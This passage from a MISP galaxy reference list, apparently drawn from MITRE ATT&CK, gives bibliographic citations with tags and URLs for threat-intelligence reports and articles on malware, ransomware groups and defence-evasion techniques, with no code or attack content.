Hexacorn. (2014, April 16). Beyond good ol’ Run key, Part 10. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="Hexacorn Office Test"

Table 12859. Table References

Links

http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/

Hexacorn Logon Scripts

Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part 18. Retrieved November 15, 2019.

The tag is: misp-galaxy:references="Hexacorn Logon Scripts"

Table 12860. Table References

Links

http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/

Hexacorn Office Template Macros

Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="Hexacorn Office Template Macros"

Table 12861. Table References

Links

http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/

Bginfo.exe - LOLBAS Project

LOLBAS. (2018, May 25). Bginfo.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Bginfo.exe - LOLBAS Project"

Table 12862. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/

BianLian Ransomware Gang Gives It a Go! | [redacted]

Ben Armstrong, Lauren Pearce, Brad Pittack, Danny Quist. (2022, September 1). BianLian Ransomware Gang Gives It a Go!. Retrieved May 18, 2023.

The tag is: misp-galaxy:references="BianLian Ransomware Gang Gives It a Go! | [redacted]"

Table 12863. Table References

Links

https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/

Group IB APT 41 June 2021

Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.

The tag is: misp-galaxy:references="Group IB APT 41 June 2021"

Table 12864. Table References

Links

https://www.group-ib.com/blog/colunmtk-apt41/

Crowdstrike Indrik November 2018

Frankoff, S., Hartley, B. (2018, November 14). Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="Crowdstrike Indrik November 2018"

Table 12865. Table References

Links

https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/

CrowdStrike Ryuk January 2019

Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.

The tag is: misp-galaxy:references="CrowdStrike Ryuk January 2019"

Table 12866. Table References

Links

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

OWASP Binary Planting

OWASP. (2013, January 30). Binary planting. Retrieved June 7, 2016.

The tag is: misp-galaxy:references="OWASP Binary Planting"

Table 12867. Table References

Links

https://www.owasp.org/index.php/Binary_planting

Wikipedia Binary-to-text Encoding

Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="Wikipedia Binary-to-text Encoding"

Table 12868. Table References

Links

https://en.wikipedia.org/wiki/Binary-to-text_encoding

Sucuri BIND9 August 2015

Cid, D. (2015, August 2). BIND9 – Denial of Service Exploit in the Wild. Retrieved April 26, 2019.

The tag is: misp-galaxy:references="Sucuri BIND9 August 2015"

Table 12869. Table References

Links

https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html

Wikipedia BIOS

Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016.

The tag is: misp-galaxy:references="Wikipedia BIOS"

Table 12870. Table References

Links

https://en.wikipedia.org/wiki/BIOS

Ge 2011

Ge, L. (2011, September 9). BIOS Threat is Showing up Again!. Retrieved November 14, 2014.

The tag is: misp-galaxy:references="Ge 2011"

Table 12871. Table References

Links

http://www.symantec.com/connect/blogs/bios-threat-showing-again

Talos Bisonal Mar 2020

Mercer, W., et al. (2020, March 5). Bisonal: 10 years of play. Retrieved January 26, 2022.

The tag is: misp-galaxy:references="Talos Bisonal Mar 2020"

Table 12872. Table References

Links

https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html

Talos Bisonal 10 Years March 2020

Warren Mercer, Paul Rascagneres, Vitor Ventura. (2020, March 6). Bisonal 10 Years of Play. Retrieved October 17, 2021.

The tag is: misp-galaxy:references="Talos Bisonal 10 Years March 2020"

Table 12873. Table References

Links

https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html

Unit 42 Bisonal July 2018

Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018.

The tag is: misp-galaxy:references="Unit 42 Bisonal July 2018"

Table 12874. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/

Bitsadmin.exe - LOLBAS Project

LOLBAS. (2018, May 25). Bitsadmin.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Bitsadmin.exe - LOLBAS Project"

Table 12875. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/

Microsoft BITSAdmin

Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.

The tag is: misp-galaxy:references="Microsoft BITSAdmin"

Table 12876. Table References

Links

https://msdn.microsoft.com/library/aa362813.aspx

Cisco Talos Bitter Bangladesh May 2022

Raghuprasad, C. (2022, May 11). Bitter APT adds Bangladesh to their targets. Retrieved June 1, 2022.

The tag is: misp-galaxy:references="Cisco Talos Bitter Bangladesh May 2022"

Table 12877. Table References

Links

https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html

Forcepoint BITTER Pakistan Oct 2016

Dela Paz, R. (2016, October 21). BITTER: a targeted attack against Pakistan. Retrieved June 1, 2022.

The tag is: misp-galaxy:references="Forcepoint BITTER Pakistan Oct 2016"

Table 12878. Table References

Links

https://www.forcepoint.com/blog/x-labs/bitter-targeted-attack-against-pakistan

Camba RARSTONE

Camba, A. (2013, February 27). BKDR_RARSTONE: New RAT to Watch Out For. Retrieved January 8, 2016.

The tag is: misp-galaxy:references="Camba RARSTONE"

Table 12879. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/

TrendMicro BKDR_URSNIF.SM

Sioting, S. (2013, June 15). BKDR_URSNIF.SM. Retrieved June 5, 2019.

The tag is: misp-galaxy:references="TrendMicro BKDR_URSNIF.SM"

Table 12880. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/BKDR_URSNIF.SM?_ga=2.129468940.1462021705.1559742358-1202584019.1549394279

Cyble September 28 2022

Cybleinc. (2022, September 28). Bl00dy – New Ransomware Strain Active in the Wild. Retrieved August 3, 2023.

The tag is: misp-galaxy:references="Cyble September 28 2022"

Table 12881. Table References

Links

https://cyble.com/blog/bl00dy-new-ransomware-strain-active-in-the-wild/

Trend Micro Pikabot January 9 2024

Shinji Robert Arasawa, Joshua Aquino, Charles Steven Derion, Juhn Emmanuel Atanque, Francisrey Joshua Castillo, John Carlo Marquez, Henry Salcedo, John Rainier Navato, Arianne Dela Cruz, Raymart Yambot, Ian Kenefick. (2024, January 9). Black Basta-Affiliated Water Curupira’s Pikabot Spam Campaign. Retrieved January 11, 2024.

The tag is: misp-galaxy:references="Trend Micro Pikabot January 9 2024"

Table 12882. Table References

Links

https://www.trendmicro.com/en_us/research/24/a/a-look-into-pikabot-spam-wave-campaign.html

Check Point Black Basta October 2022

Check Point. (2022, October 20). BLACK BASTA AND THE UNNOTICED DELIVERY. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Check Point Black Basta October 2022"

Table 12883. Table References

Links

https://research.checkpoint.com/2022/black-basta-and-the-unnoticed-delivery/

BlackBasta

Antonio Cocomazzi and Antonio Pirozzi. (2022, November 3). Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor. Retrieved March 14, 2023.

The tag is: misp-galaxy:references="BlackBasta"

Table 12884. Table References

Links

https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/

Trend Micro Black Basta October 2022

Kenefick, I. et al. (2022, October 12). Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike. Retrieved February 6, 2023.

The tag is: misp-galaxy:references="Trend Micro Black Basta October 2022"

Table 12885. Table References

Links

https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html

Uptycs Black Basta ESXi June 2022

Sharma, S. and Hegde, N. (2022, June 7). Black basta Ransomware Goes Cross-Platform, Now Targets ESXi Systems. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Uptycs Black Basta ESXi June 2022"

Table 12886. Table References

Links

https://www.uptycs.com/blog/black-basta-ransomware-goes-cross-platform-now-targets-esxi-systems

BlackBerry Black Basta May 2022

Ballmer, D. (2022, May 6). Black Basta: Rebrand of Conti or Something New?. Retrieved March 7, 2023.

The tag is: misp-galaxy:references="BlackBerry Black Basta May 2022"

Table 12887. Table References

Links

https://blogs.blackberry.com/en/2022/05/black-basta-rebrand-of-conti-or-something-new

FBI BlackCat April 19 2022

FBI. (2022, April 19). BlackCat/ALPHV Ransomware Indicators of Compromise. Retrieved September 14, 2023.

The tag is: misp-galaxy:references="FBI BlackCat April 19 2022"

Table 12888. Table References

Links

https://www.ic3.gov/Media/News/2022/220420.pdf

X-Force BlackCat May 30 2023

IBM Security X-Force Team. (2023, May 30). BlackCat (ALPHV) ransomware levels up for stealth, speed and exfiltration. Retrieved September 14, 2023.

The tag is: misp-galaxy:references="X-Force BlackCat May 30 2023"

Table 12889. Table References

Links

https://securityintelligence.com/posts/blackcat-ransomware-levels-up-stealth-speed-exfiltration/

BlackBerry BlackCat Threat Overview

BlackBerry. (n.d.). BlackCat Malware (AKA ALPHV). Retrieved September 14, 2023.

The tag is: misp-galaxy:references="BlackBerry BlackCat Threat Overview"

Table 12890. Table References

Links

https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/blackcat

Sophos BlackCat Jul 2022

Brandt, Andrew. (2022, July 14). BlackCat ransomware attacks not merely a byproduct of bad luck. Retrieved December 20, 2022.

The tag is: misp-galaxy:references="Sophos BlackCat Jul 2022"

Table 12891. Table References

Links

https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/

ESET BlackEnergy Jan 2016

Cherepanov, A. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry. Retrieved June 10, 2020.

The tag is: misp-galaxy:references="ESET BlackEnergy Jan 2016"

Table 12892. Table References

Links

https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/

ESEST Black Energy Jan 2016

Cherepanov, A. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry. Retrieved May 18, 2016.

The tag is: misp-galaxy:references="ESEST Black Energy Jan 2016"

Table 12893. Table References

Links

http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/

F-Secure BlackEnergy 2014

F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.

The tag is: misp-galaxy:references="F-Secure BlackEnergy 2014"

Table 12894. Table References

Links

https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf

Securelist BlackOasis Oct 2017

Kaspersky Lab’s Global Research & Analysis Team. (2017, October 16). BlackOasis APT and new targeted attacks leveraging zero-day exploit. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="Securelist BlackOasis Oct 2017"

Table 12895. Table References

Links

https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/

Palo Alto Black-T October 2020

Quist, N. (2020, October 5). Black-T: New Cryptojacking Variant from TeamTNT. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Palo Alto Black-T October 2020"

Table 12896. Table References

Links

https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/

BlackWater Malware Cloudflare Workers

Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.

The tag is: misp-galaxy:references="BlackWater Malware Cloudflare Workers"

Table 12897. Table References

Links

https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/

NHS UK BLINDINGCAN Aug 2020

NHS Digital . (2020, August 20). BLINDINGCAN Remote Access Trojan. Retrieved August 20, 2020.

The tag is: misp-galaxy:references="NHS UK BLINDINGCAN Aug 2020"

Table 12898. Table References

Links

https://digital.nhs.uk/cyber-alerts/2020/cc-3603

Azure Blob Snapshots

Microsoft Azure. (2021, December 29). Blob snapshots. Retrieved March 2, 2022.

The tag is: misp-galaxy:references="Azure Blob Snapshots"

Table 12899. Table References

Links

https://docs.microsoft.com/en-us/azure/storage/blobs/snapshots-overview

objsee block blocking login items

Patrick Wardle. (2018, July 23). Block Blocking Login Items. Retrieved October 1, 2021.

The tag is: misp-galaxy:references="objsee block blocking login items"

Table 12900. Table References

Links

https://objective-see.com/blog/blog_0x31.html

Technospot Chrome Extensions GP

Mohta, A. (n.d.). Block Chrome Extensions using Google Chrome Group Policy Settings. Retrieved January 10, 2018.

The tag is: misp-galaxy:references="Technospot Chrome Extensions GP"

Table 12901. Table References

Links

http://www.technospot.net/blogs/block-chrome-extensions-using-google-chrome-group-policy-settings/

Evi1cg Forfiles Nov 2017

Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved January 22, 2018.

The tag is: misp-galaxy:references="Evi1cg Forfiles Nov 2017"

Table 12902. Table References

Links

https://twitter.com/Evi1cg/status/935027922397573120

Fifield Blocking Resistent Communication through domain fronting 2015

David Fifield, Chang Lan, Rod Hynes, Percy Wegmann, and Vern Paxson. (2015). Blocking-resistant communication through domain fronting. Retrieved November 20, 2017.

The tag is: misp-galaxy:references="Fifield Blocking Resistent Communication through domain fronting 2015"

Table 12903. Table References

Links

http://www.icir.org/vern/papers/meek-PETS-2015.pdf

GitHub Bloodhound

Robbins, A., Vazarkar, R., and Schroeder, W. (2016, April 17). Bloodhound: Six Degrees of Domain Admin. Retrieved March 5, 2019.

The tag is: misp-galaxy:references="GitHub Bloodhound"

Table 12904. Table References

Links

https://github.com/BloodHoundAD/BloodHound

Blue Cloud of Death Video

Kunz, Bryce. (2018, October 14). Blue Cloud of Death: Red Teaming Azure. Retrieved November 21, 2019.

The tag is: misp-galaxy:references="Blue Cloud of Death Video"

Table 12905. Table References

Links

https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815

Blue Cloud of Death

Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming Azure. Retrieved October 23, 2019.

The tag is: misp-galaxy:references="Blue Cloud of Death"

Table 12906. Table References

Links

https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1

apple doco bonjour description

Apple Inc. (2013, April 23). Bonjour Overview. Retrieved October 11, 2021.

The tag is: misp-galaxy:references="apple doco bonjour description"

Table 12907. Table References

Links

https://developer.apple.com/library/archive/documentation/Cocoa/Conceptual/NetServices/Introduction.html

Booby Trap Shortcut 2017

Weyne, F. (2017, April). Booby trap a shortcut with a backdoor. Retrieved October 3, 2023.

The tag is: misp-galaxy:references="Booby Trap Shortcut 2017"

Table 12908. Table References

Links

https://www.uperesia.com/booby-trapped-shortcut

Microsoft Bootcfg

Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August 30, 2021.

The tag is: misp-galaxy:references="Microsoft Bootcfg"

Table 12909. Table References

Links

https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg

Imperva DDoS for Hire

Imperva. (n.d.). Booters, Stressers and DDoSers. Retrieved October 4, 2020.

The tag is: misp-galaxy:references="Imperva DDoS for Hire"

Table 12910. Table References

Links

https://www.imperva.com/learn/ddos/booters-stressers-ddosers/

Wikipedia Booting

Wikipedia. (n.d.). Booting. Retrieved November 13, 2019.

The tag is: misp-galaxy:references="Wikipedia Booting"

Table 12911. Table References

Links

https://en.wikipedia.org/wiki/Booting

FireEye BOOTRASH SANS

Glyer, C. (2017, June 22). Boot What?. Retrieved May 4, 2020.

The tag is: misp-galaxy:references="FireEye BOOTRASH SANS"

Table 12912. Table References

Links

https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1498163766.pdf

Unit42 LockerGoga 2019

Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="Unit42 LockerGoga 2019"

Table 12913. Table References

Links

https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/

Threatexpress MetaTwin 2017

Vest, J. (2017, October 9). Borrowing Microsoft MetaData and Signatures to Hide Binary Payloads. Retrieved September 10, 2019.

The tag is: misp-galaxy:references="Threatexpress MetaTwin 2017"

Table 12914. Table References

Links

https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/

Sandfly BPFDoor 2022

The Sandfly Security Team. (2022, May 11). BPFDoor - An Evasive Linux Backdoor Technical Analysis. Retrieved September 29, 2023.

The tag is: misp-galaxy:references="Sandfly BPFDoor 2022"

Table 12915. Table References

Links

https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/

AADInternals - BPRT

Dr. Nestori Syynimaa. (2021, January 31). BPRT unleashed: Joining multiple devices to Azure AD and Intune. Retrieved March 4, 2022.

The tag is: misp-galaxy:references="AADInternals - BPRT"

Table 12916. Table References

Links

https://o365blog.com/post/bprt/

Brazking-Websockets

Shahar Tavor. (n.d.). BrazKing Android Malware Upgraded and Targeting Brazilian Banks. Retrieved March 24, 2023.

The tag is: misp-galaxy:references="Brazking-Websockets"

Table 12917. Table References

Links

https://securityintelligence.com/posts/brazking-android-malware-upgraded-targeting-brazilian-banks/

MSTIC Nobelium Toolset May 2021

MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.

The tag is: misp-galaxy:references="MSTIC Nobelium Toolset May 2021"

Table 12918. Table References

Links

https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

Lee 2013

Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.

The tag is: misp-galaxy:references="Lee 2013"

Table 12919. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html

sentinelone-malvertising

Hegel, Tom. (2023, January 19). Breaking Down the SEO Poisoning Attack | How Attackers Are Hijacking Search Results. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="sentinelone-malvertising"

Table 12920. Table References

Links

https://www.sentinelone.com/blog/breaking-down-the-seo-poisoning-attack-how-attackers-are-hijacking-search-results/

OS X Keychain

Juuso Salonen. (2012, September 5). Breaking into the OS X keychain. Retrieved July 15, 2017.

The tag is: misp-galaxy:references="OS X Keychain"

Table 12921. Table References

Links

http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain

Brown Exploiting Linkers

Tim Brown. (2011, June 29). Breaking the links: Exploiting the linker. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Brown Exploiting Linkers"

Table 12922. Table References

Links

http://www.nth-dimension.org.uk/pub/BTL.pdf

FireEye Outlook Dec 2019

McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020.

The tag is: misp-galaxy:references="FireEye Outlook Dec 2019"

Table 12923. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html

Cisco Talos Blog December 08 2022

Cisco Talos Blog. (2022, December 8). Breaking the silence - Recent Truebot activity. Retrieved May 8, 2023.

The tag is: misp-galaxy:references="Cisco Talos Blog December 08 2022"

Table 12924. Table References

Links

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

PaloAlto Preventing Opportunistic Attacks Apr 2016

Kiwi. (2016, April 6). Breakout Recap: Cybersecurity Best Practices Part 1 - Preventing Opportunistic Attacks. Retrieved October 3, 2018.

The tag is: misp-galaxy:references="PaloAlto Preventing Opportunistic Attacks Apr 2016"

Table 12925. Table References

Links

https://live.paloaltonetworks.com/t5/Ignite-2016-Blog/Breakout-Recap-Cybersecurity-Best-Practices-Part-1-Preventing/ba-p/75913

Mandiant BYOL 2018

Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 8, 2021.

The tag is: misp-galaxy:references="Mandiant BYOL 2018"

Table 12926. Table References

Links

https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique

Mandiant BYOL

Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="Mandiant BYOL"

Table 12927. Table References

Links

https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique

Comparitech Leak

Bischoff, P. (2020, October 15). Broadvoice database of more than 350 million customer records exposed online. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Comparitech Leak"

Table 12928. Table References

Links

https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/

ThreatPost Broadvoice Leak

Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="ThreatPost Broadvoice Leak"

Table 12929. Table References

Links

https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/

Secureworks BRONZE BUTLER Oct 2017

Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.

The tag is: misp-galaxy:references="Secureworks BRONZE BUTLER Oct 2017"

Table 12930. Table References

Links

https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses

Secureworks BRONZE HUNTLEY

Secureworks. (2021, January 1). BRONZE HUNTLEY Threat Profile. Retrieved May 5, 2021.

The tag is: misp-galaxy:references="Secureworks BRONZE HUNTLEY"

Table 12931. Table References

Links

https://www.secureworks.com/research/threat-profiles/bronze-huntley

Secureworks BRONZE PRESIDENT December 2019

Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021.

The tag is: misp-galaxy:references="Secureworks BRONZE PRESIDENT December 2019"

Table 12932. Table References

Links

https://www.secureworks.com/research/bronze-president-targets-ngos

SecureWorks BRONZE UNION June 2017

Counter Threat Unit Research Team. (2017, June 27). BRONZE UNION Cyberespionage Persists Despite Disclosures. Retrieved July 13, 2017.

The tag is: misp-galaxy:references="SecureWorks BRONZE UNION June 2017"

Table 12933. Table References

Links

https://www.secureworks.com/research/bronze-union

Wikipedia Browser Extension

Wikipedia. (2017, October 8). Browser Extension. Retrieved January 11, 2018.

The tag is: misp-galaxy:references="Wikipedia Browser Extension"

Table 12934. Table References

Links

https://en.wikipedia.org/wiki/Browser_extension

Mr. D0x BitB 2022

mr.d0x. (2022, March 15). Browser In The Browser (BITB) Attack. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Mr. D0x BitB 2022"

Table 12935. Table References

Links

https://mrd0x.com/browser-in-the-browser-phishing-attack/

Cobalt Strike Browser Pivot

Mudge, R. (n.d.). Browser Pivoting. Retrieved January 10, 2018.

The tag is: misp-galaxy:references="Cobalt Strike Browser Pivot"

Table 12936. Table References

Links

https://www.cobaltstrike.com/help-browser-pivoting

Symantec Buckeye

Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. Retrieved September 26, 2016.

The tag is: misp-galaxy:references="Symantec Buckeye"

Table 12937. Table References

Links

http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong

ESET Buhtrap and Buran April 2019

ESET Research. (2019, April 30). Buhtrap backdoor and Buran ransomware distributed via major advertising platform. Retrieved May 11, 2020.

The tag is: misp-galaxy:references="ESET Buhtrap and Buran April 2019"

Table 12938. Table References

Links

https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/

S1 Custom Shellcode Tool

Bunce, D. (2019, October 31). Building A Custom Tool For Shellcode Analysis. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="S1 Custom Shellcode Tool"

Table 12939. Table References

Links

https://www.sentinelone.com/blog/building-a-custom-tool-for-shellcode-analysis/

Data Driven Security DGA

Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019.

The tag is: misp-galaxy:references="Data Driven Security DGA"

Table 12940. Table References

Links

https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/

CTD PPID Spoofing Macro Mar 2019

Tafani-Dereeper, C. (2019, March 12). Building an Office macro to spoof parent processes and command line arguments. Retrieved June 3, 2019.

The tag is: misp-galaxy:references="CTD PPID Spoofing Macro Mar 2019"

Table 12941. Table References

Links

https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/

Cybereason Bumblebee August 2022

Cybereason. (2022, August 17). Bumblebee Loader – The High Road to Enterprise Domain Control. Retrieved August 29, 2022.

The tag is: misp-galaxy:references="Cybereason Bumblebee August 2022"

Table 12942. Table References

Links

https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control

Symantec Bumblebee June 2022

Kamble, V. (2022, June 28). Bumblebee: New Loader Rapidly Assuming Central Position in Cyber-crime Ecosystem. Retrieved August 24, 2022.

The tag is: misp-galaxy:references="Symantec Bumblebee June 2022"

Table 12943. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime

objsee netwire backdoor 2019

Patrick Wardle. (2019, June 20). Burned by Fire(fox). Retrieved October 1, 2021.

The tag is: misp-galaxy:references="objsee netwire backdoor 2019"

Table 12944. Table References

Links

https://objective-see.com/blog/blog_0x44.html

401 TRG Winnti Umbrella May 2018

Hegel, T. (2018, May 3). Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers. Retrieved July 8, 2018.

The tag is: misp-galaxy:references="401 TRG Winnti Umbrella May 2018"

Table 12945. Table References

Links

https://401trg.github.io/pages/burning-umbrella.html

Bypassing Gatekeeper

Thomas Reed. (2016, March 31). Bypassing Apple’s Gatekeeper. Retrieved July 5, 2017.

The tag is: misp-galaxy:references="Bypassing Gatekeeper"

Table 12946. Table References

Links

https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/

engima0x3 DNX Bypass

Nelson, M. (2017, November 17). Bypassing Application Whitelisting By Using dnx.exe. Retrieved May 25, 2017.

The tag is: misp-galaxy:references="engima0x3 DNX Bypass"

Table 12947. Table References

Links

https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/

engima0x3 RCSI Bypass

Nelson, M. (2016, November 21). Bypassing Application Whitelisting By Using rcsi.exe. Retrieved May 26, 2017.

The tag is: misp-galaxy:references="engima0x3 RCSI Bypass"

Table 12948. Table References

Links

https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/

Exploit Monday WinDbg

Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved May 26, 2017.

The tag is: misp-galaxy:references="Exploit Monday WinDbg"

Table 12949. Table References

Links

http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html

SubTee MSBuild

Smith, C. (2016, September 13). Bypassing Application Whitelisting using MSBuild.exe - Device Guard Example and Mitigations. Retrieved September 13, 2016.

The tag is: misp-galaxy:references="SubTee MSBuild"

Bypassing CloudTrail in AWS Service Catalog

Nick Frichette. (2023, March 20). Bypassing CloudTrail in AWS Service Catalog, and Other Logging Research. Retrieved September 18, 2023.

The tag is: misp-galaxy:references="Bypassing CloudTrail in AWS Service Catalog"

Table 12950. Table References

Links

https://securitylabs.datadoghq.com/articles/bypass-cloudtrail-aws-service-catalog-and-other/

AADInternals - Conditional Access Bypass

Dr. Nestori Syynimaa. (2020, September 6). Bypassing conditional access by faking device compliance. Retrieved March 4, 2022.

The tag is: misp-galaxy:references="AADInternals - Conditional Access Bypass"

Table 12951. Table References

Links

https://o365blog.com/post/mdm

MsitPros CHM Aug 2017

Moe, O. (2017, August 13). Bypassing Device guard UMCI using CHM – CVE-2017-8625. Retrieved October 3, 2018.

The tag is: misp-galaxy:references="MsitPros CHM Aug 2017"

Table 12952. Table References

Links

https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/

enigma0x3 sdclt app paths

Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017.

The tag is: misp-galaxy:references="enigma0x3 sdclt app paths"

Table 12953. Table References

Links

https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/

MDSec System Calls

MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="MDSec System Calls"

Table 12954. Table References

Links

https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/

Hybrid Analysis Icacls1 June 2018

Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018.

The tag is: misp-galaxy:references="Hybrid Analysis Icacls1 June 2018"

Table 12955. Table References

Links

https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100

Microsoft Credential Manager store
